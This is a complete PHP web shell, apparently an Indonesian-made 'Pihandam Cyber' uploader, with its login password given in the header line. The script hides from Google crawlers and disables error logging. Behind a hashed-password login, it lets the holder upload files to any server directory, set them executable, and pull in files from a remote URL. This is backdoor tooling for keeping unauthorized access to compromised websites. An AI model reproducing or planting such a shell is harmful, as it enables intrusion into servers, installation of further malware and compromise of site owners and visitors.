Uploader Pihandam Cyber ( password: hacked )

1. <?php
2. $auth_pass = "4d4098d64e163d2726959455d046fd7c";
3. $color = "#00ff00";
4. $default_action = 'FilesMan';
5. @define('SELF_PATH', __FILE__);
6. if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
7. header('HTTP/1.0 404 Not Found');
8. exit;
9. }
10. @session_start();
11. @error_reporting(0);
12. @ini_set('error_log', NULL);
13. @ini_set('log_errors', 0);
14. @ini_set('max_execution_time', 0);
15. @ini_set('display_errors', 0);
16. @set_time_limit(0);
17. @set_magic_quotes_runtime(0);
18. @define('VERSION', '2.1');
19. if (get_magic_quotes_gpc()) {
20. function stripslashes_array($array) {
21. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
22. }
23. $_POST = stripslashes_array($_POST);
24. }
25. function printLogin() {
26. ?>
27. <!DOCTYPE html>
28. <html dir="ltr">
29. <head>
30. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
31. <title>Uploader Pihandam Cyber</title>
32. <br>
33. <html xmlns="http://www.w3.org/1999/xhtml">
34. <head>
35. <title>Silahkan Login</title>
36. <link rel="icon" href="../favicon.ico">
37. <meta name="description" content="Remote Cpanel Account" />
38. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
39. <style>
40. body {
41. background:#000;
42. padding:0;
43. margin:0;
44. font-family: 'Audiowide', serif;
45. }
46. .img {
47. margin:10px;
48. }
49. .input-text {
50. border:1px solid lime;
51. background:#000;
52. color:#fff;
53. }
54. .input-button {
55. background:#3f3f3f;
56. color:#fff;
57. border:1px solid#3f3f3f;
58. }
59. .border-1 {
60. margin:0;
61. padding:0;
62. border:2px solid#3f3f3f;
63. }
64. .border-2 {
65. margin:0;
66. padding:0;
67. border:3px dotted#3f3f3f;
68. }
69. .border-3 {
70. margin:0;
71. padding:0;
72. border:2px solid#3f3f3f;
73. }
74. </style>
75. </head>
76. <body>
77. <div class="border-1">
78. <div class="border-2">
79. <div class="border-3">
80. <form method=post>
81. <center><input size="20" type="password" name="pass" class="input-text">
82. <input type="submit" class="input-button" value="Login">
83. </center></form>
84. <br/>
85. <br/>
86. </div>
87. </div>
88. </div>
89. </body>
90. </html>
91. <?php
92. exit;
93. }
94. if (!isset($_SESSION[md5($_SERVER['HTTP_HOST']) ])) if (empty($auth_pass) || (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) $_SESSION[md5($_SERVER['HTTP_HOST']) ] = true;
95. else printLogin();
96. ?>
97.  
98. <?php
99. echo '<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.2//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile12.dtd">
100. <html xmlns="http://www.w3.org/1999/xhtml" lang="en">
101. <head>
102. <title>Upload Files | ./P1h4nd4M Cyb3R&trade;</title>
103. <meta http-equiv="Content-Type" content="application/vnd.wap.xhtml+xml; charset=utf-8" />
104. <meta name="viewport" content="width=device-width,initial-scale=1">
105. <center><b><font color="lime">Selamat Datang ./Erorcode403</font></b></center>
106.  
107. </head>
108. <style>body {
109. background-color: black;
110. color: #303030;
111. } input, button {
112. color : #00ff00;
113. background-color : black;
114. border : 1px solid #303030;
115. } form {
116. margin: 0;
117. padding: 0;
118. } </style>';
119. if(isset($_POST['upload'])){
120. $dir = $_POST['dir'];
121. $ch = $_POST['chmod'];
122. foreach($_FILES['file']['name'] as $key=>$val) {
123. $name=$_FILES['file']['name'][$key];
124. $tmp=$_FILES['file']['tmp_name'][$key];
125. if(trim($name)!='') {
126. if(move_uploaded_file($tmp,$dir.'/'.$name)) {
127. if($ch == 'yes') {
128. $chmod = chmod($dir.'/'.$name,0755);
129. echo '<br/><font color="white">Upload => '.$name.'</font><font color="lime">Berhasil !</font>
130. <br/>
131. <font color="white">Chmod 755 =></font><font color="lime">Berhasil !</font></div>';
132. } else {
133. echo '<br/><font color="white">Upload => '.$name.'</font><font color="lime">Berhasil !</font></div>';
134. }
135. } else {
136. echo '<br/><font color="white">Upload => '.$name.'</font><font color="red">Gagal</font></div>';
137. }
138. }
139. }
140. }
141. $time=time();
142. $gmt='+7';
143. $jm='3600';
144. $var=$time+($gmt*$jm);
145. $now=gmdate('Y',$var);
146. ?>
147. <form method="post"enctype="multipart/form-data"action="">
148. <table>
149. <tr>
150. <td>File :</td>
151. </tr><tr>
152. <td><input type="file"name="file[]"/><td/>
153. </tr><tr>
154. <td><input type="file"name="file[]"/><td/>
155. </tr><tr>
156. <td><input type="file"name="file[]"/><td/>
157. </tr><tr>
158. <td><font color="white">Auto Chmod 755</font><select style="color:lime;background-color:#000000"
159. name="chmod"><option value="no">No</option><option value="yes">Yes</option></select></td>
160. </tr><tr>
161. <td><font color="white">Upload To :</font></td>
162. </tr><tr>
163. <td><input name="dir" type="text" value="<?php echo dirname(__FILE__); ?>"></td>
164. </tr><tr>
165. <td><input type="submit"name="upload"value="Upload"/></td>
166. </tr>
167. </table>
168. </form>
169. <br/><center><form method="post">
170. <input name="url" size="30" />
171. <input name="submit" type="submit" />
172. </form></center>
173. </div>
174. <center><font color="white">Powered by P1h4nd4M Cyb3R&trade;<br/>
175. <?php echo ''.$_SERVER['HTTP_HOST'].' - &copy; '.$now.''; ?></font><br/>
176. </center>
177. <?php
178.  
179. // maximum execution time in seconds
180. set_time_limit (24 * 60 * 60);
181.  
182. if (!isset($_POST['submit'])) die();
183.  
184. // folder to save downloaded files to. must end with slash
185. $destination_folder = 'files/';
186.  
187. $url = $_POST['url'];
188. $newfname = $destination_folder . basename($url);
189.  
190. $file = fopen ($url, "rb");
191. if ($file) {
192. $newf = fopen ($newfname, "wb");
193.  
194. if ($newf)
195. while(!feof($file)) {
196. fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
197. }
198. }
199.  
200. if ($file) {
201. fclose($file);
202. }
203.  
204. if ($newf) {
205. fclose($newf);
206. }
207.  
208. ?>
209. </center>